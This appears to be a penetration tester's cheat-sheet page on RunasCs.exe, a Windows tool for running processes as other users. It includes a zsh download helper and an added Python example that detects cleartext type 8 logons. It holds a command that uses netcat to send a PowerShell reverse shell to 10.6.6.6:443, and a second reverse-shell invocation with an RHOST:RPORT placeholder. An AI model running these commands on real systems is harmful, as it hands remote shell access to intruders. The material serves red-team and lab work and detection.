Spawn Processes as Other Users

RunasCs.exe

Project GitHub

https://github.com/antonioCoco/RunasCs/releases

Example Usage

Spawn Process with Network Credentials

# -l 8 : logontype 8 (NetworkCleartext)
# Launch reverse PowerShell session over Netcat socket
.\RunasCs.exe -d domain.tld -l 8 'username' 'password' 'C:\Windows\Temp\nc.exe 10.6.6.6 443 -e powershell.exe'
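
On the defensive side, Windows records a successful logon as Security event 4624 with a LogonType field, and the `-l 8` logon above appears there as type 8 (NetworkCleartext). The following is an added example, not part of the original notes or the RunasCs project: it filters exported logon events for type 8 logons made by processes outside an allowlist. The one-JSON-object-per-line export layout, the allowlist and the sample events are assumptions constructed for illustration.

```python
import json

NETWORK_CLEARTEXT = "8"  # LogonType value for the -l 8 logon shown above

# Assumption: processes expected to perform cleartext network logons on this
# host (for example IIS Basic auth). Tune per environment.
EXPECTED_PROCESSES = {r"c:\windows\system32\inetsrv\w3wp.exe"}

# Constructed sample: Security events flattened to one JSON object per line.
SAMPLE_EVENTS = [
    r'{"EventID": 4624, "TimeCreated": "2024-01-01T10:00:00Z", "LogonType": "3", "TargetDomainName": "DOMAIN", "TargetUserName": "alice", "ProcessName": "-"}',
    r'{"EventID": 4624, "TimeCreated": "2024-01-01T10:01:00Z", "LogonType": "8", "TargetDomainName": "DOMAIN", "TargetUserName": "webuser", "ProcessName": "C:\\Windows\\System32\\inetsrv\\w3wp.exe"}',
    r'{"EventID": 4624, "TimeCreated": "2024-01-01T10:02:00Z", "LogonType": "8", "TargetDomainName": "DOMAIN", "TargetUserName": "svc_backup", "ProcessName": "C:\\Windows\\Temp\\RunasCs.exe"}',
    r'{"EventID": 4625, "TimeCreated": "2024-01-01T10:03:00Z", "LogonType": "8", "TargetDomainName": "DOMAIN", "TargetUserName": "bob", "ProcessName": "C:\\Windows\\Temp\\RunasCs.exe"}',
    "not-json",
]


def find_unexpected_cleartext_logons(lines, expected=EXPECTED_PROCESSES):
    """Return successful type 8 logons whose calling process is not allowlisted."""
    hits = []
    for line in lines:
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip truncated or non-JSON lines
        if not isinstance(ev, dict):
            continue
        if str(ev.get("EventID")) != "4624":  # successful logons only
            continue
        if str(ev.get("LogonType")) != NETWORK_CLEARTEXT:
            continue
        process = str(ev.get("ProcessName", ""))
        if process.lower() in expected:
            continue
        hits.append({
            "time": ev.get("TimeCreated"),
            "account": f'{ev.get("TargetDomainName")}\\{ev.get("TargetUserName")}',
            "process": process,
        })
    return hits


if __name__ == "__main__":
    for hit in find_unexpected_cleartext_logons(SAMPLE_EVENTS):
        print(hit)
```
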

Spawn Process with Logon

.\RunasCs.exe username_here password_here powershell.exe -r RHOST:RPORT

Easy Download

I put a function in my .zshrc file and run download_runascs to easily grab the latest version of the binary from GitHub releases.

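# Download latest version of RunasCs from GitHub
function download_runascs() {

    # Variables (local, so they do not leak into the interactive shell)
    local download_base_url='https://github.com/antonioCoco/RunasCs/releases/download'
    local tags_base_url='https://github.com/antonioCoco/RunasCs/tags'
    local output_name='RunasCs.zip'
    local url_version binary_version download_url

    # Scrape the newest release tag from the tags page
    url_version=$(
        curl -fsSL "$tags_base_url" |
        grep 'releases/tag/v' |
        head -n 1 |
        cut -d '>' -f 3 |
        cut -d '<' -f 1
    )
    # Abort instead of requesting a malformed URL if the scrape returned nothing
    if [[ -z "$url_version" ]]; then
        echo "Could not determine the latest RunasCs version" >&2
        return 1
    fi
    binary_version="${url_version#v}"
    download_url="${download_base_url}/${url_version}/${output_name}"

    # Download and extract; stop if either step fails
    curl -fsSL "$download_url" -o "$PWD/${output_name}" || return 1
    unzip -qq "$PWD/${output_name}" || return 1
    echo "RunasCs ${binary_version} binaries downloaded and unarchived in $PWD"

}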